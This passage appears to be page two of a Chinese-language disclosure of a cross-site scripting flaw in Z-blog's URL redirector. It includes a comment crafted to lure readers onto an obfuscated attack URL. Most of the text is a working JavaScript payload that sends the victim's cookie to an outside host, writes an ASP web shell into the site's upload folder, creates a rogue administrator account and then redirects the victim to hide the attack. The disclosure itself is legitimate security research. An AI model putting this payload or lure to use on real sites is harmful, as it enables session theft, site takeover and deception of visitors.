Z-blog跨站脚本攻击漏洞

 

而z-blog的所有安全设计全部用来抵御前台的攻击，对于后台基本没有任何限制，加上antispam功能对用户提交的url连接类似于加密处理，所以很容易就可以诱惑别人访问上述的xss攻击url，可以发表评论如下：

看这个站，有新东西？

以下是引用片段： [URL=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex]http://www.80sec.com[/URL]

用户看到的是http://www.80sec.com这个信任的站点，而一旦点击将在www.foo.com域执行恶意用户指定的js，在该js里可以 写shell，添加用户，偷取COOKIE然后模拟出真正的转向，整个过程很难发现攻击的意图，80sec提供js如下：

以下是引用片段：
xmlhttp=poster(); 
cookie=document.cookie; 
login=cookie.indexOf(’password’)==-1?0:1; 
tolocation=’http://www.80sec.com/’; 

//get cookie 
x=new Image(); 
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie); 

//get a shell 
data="txaContent=<%25execute(request(%22a%22))%25>“; 
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data); 

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”; 
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data); 

//fool the user 
window.location=tolocation; 

function poster(){ 
var request = false; 
if(window.XMLHttpRequest) { 
request = new XMLHttpRequest(); 
if(request.overrideMimeType) { 
request.overrideMimeType(’text/xml’); 
} 
} else if(window.ActiveXObject) { 
var versions = [’Microsoft.XMLHTTP’, ’MSXML.XMLHTTP’, ’Microsoft.XMLHTTP’, ’Msxml2.XMLHTTP.7.0’, ’Msxml2.XMLHTTP.6.0’, ’Msxml2.XMLHTTP.5.0’, ’Msxml2.XMLHTTP.4.0’, ’MSXML2.XMLHTTP.3.0’, ’MSXML2.XMLHTTP’]; 
for(var i=0; i 
try { 
request = new ActiveXObject(versions[i]); 
} catch(e) {} 
} 
} 
return request; 
} 

function postmydata(action,data){ 
xmlhttp.open(”POST”, action, false); 
xmlhttp.setRequestHeader(’Content-Type’, ‘application/x-www-form-urlencoded’); 
xmlhttp.send(data); 
return xmlhttp.responseText; 
}

漏洞状态：已经联系官方，请等待官方公告。

上一页  [1] [2]